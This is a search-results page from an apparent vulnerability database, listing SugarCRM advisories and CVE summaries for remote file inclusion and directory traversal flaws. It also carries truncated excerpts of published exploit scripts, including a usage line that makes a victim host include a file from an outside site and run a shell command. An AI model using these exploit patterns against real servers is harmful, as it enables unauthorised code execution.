20 matches found
EUVD-2006-2460
Malware in sbrugna...
EUVD-2006-5067
Malware in sbrugna...
Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo Sugar Suite Open Source = 4.2 \OptimisticLock!\ arbitrary remote inclusion exploit\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; echo this is called the \five claws of...
CVE-2006-5082
Unspecified vulnerability in Sugar Suite Open Source SugarCRM before 4.2.1 Patch C 20060917 has unspecified impact, related to code execution, and unspecified attack vectors...
CVE-2006-5082
Technical details are not publicly available in the provided documents for CVE-2006-5082; monitor for updates.
sugarsuite.txt
!/usr/bin/php -q -d shortopentag=on \r\n"; die; / software site: http://www.sugarcrm.com/crm/ i vulnerable code in modules/OptimisticLock/LockResolve.php...
Directory traversal
Sugar Suite Open Source SugarCRM 4.2 and earlier, when registerglobals is enabled, does not protect critical variables such as $GLOBALS and $SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal or PHP remote file inclusion, as demonstrated by...
CVE-2006-2460
Sugar Suite Open Source SugarCRM 4.2 and earlier, when registerglobals is enabled, does not protect critical variables such as $GLOBALS and $SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal or PHP remote file inclusion, as demonstrated by...
CVE-2006-2460
SugarCRM (Sugar Suite Open Source)
CVE-2006-2460
Sugar Suite Open Source SugarCRM 4.2 and earlier, when registerglobals is enabled, does not protect critical variables such as $GLOBALS and $SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal or PHP remote file inclusion, as demonstrated by...
Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit
!/usr/bin/php -q -d shortopentag=on ? echo "Sugar Suite Open Source = 4.2 "OptimisticLock!" arbitrary remote inclusion exploitrn"; echo "by rgod [email protected]"; echo "site: http://retrogod.altervista.orgrnrn"; echo "this is called the "five claws of Sun-tzu"rnrn"; if $argc5 echo "Usage: ph...
Sugar Suite Open Source 4.2 - OptimisticLock Command Execution
Sugar Suite Open Source 4.2 - OptimisticLock Command Execution !/usr/bin/php -q -d shortopentag=on \r\n"; die; / software site: http://www.sugarcrm.com/crm/ i vulnerable code in modules/Optimis...
Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Sugar Suite Open Source = 4.2 "OptimisticLock!" arbitrary remote inclusion exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "this is called the "five claws...
Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit
Exploit for unknown platform in category web applications ============================================================== Sugar Suite Open Source = 4.2 OptimisticLock Remote Exploit ============================================================== !/usr/bin/php -q -d shortopentag=on ? echo "Sugar Sui...
CVE-2005-4086
Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management SugarCRM 4.0 beta and earlier allows remote attackers to include arbitrary local files via ".." sequences in the beanFiles array parameter...
CVE-2005-4086
Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management SugarCRM 4.0 beta and earlier allows remote attackers to include arbitrary local files via ".." sequences in the beanFiles array parameter...
CVE-2005-4086
SugarCRM
SugarSuite Open Source 4.0beta - Remote Code Execution (2)
SugarSuite Open Source 4.0beta - Remote Code Execution 2 / gcc -o sugar sugar.c Usage ./sugar host /path/ site cmd Sugar Suite Open Source "; fclose$fp; ? ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al HTTP/1.1 200 OK Date: Thu, 08 Dec 2005 12:35:33 GMT Server: Apache/1.3.2...
SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit (c)
No description provided by source. / gcc -o sugar sugar.c Usage ./sugar host /path/ site cmd Sugar Suite Open Source = 4.0 beta remote code execution c code coded by: pointslash v. credits: rgod, unitedasia host - hostname ex: www.sitename.com path - path ex: /sugar/ or just / site - remote...
SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit
Exploit for unknown platform in category web applications =============================================================== SugarSuite Open Source Sugar Suite Open Source body background-color:111111; SCROLLBAR-ARROW-COLOR: ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR...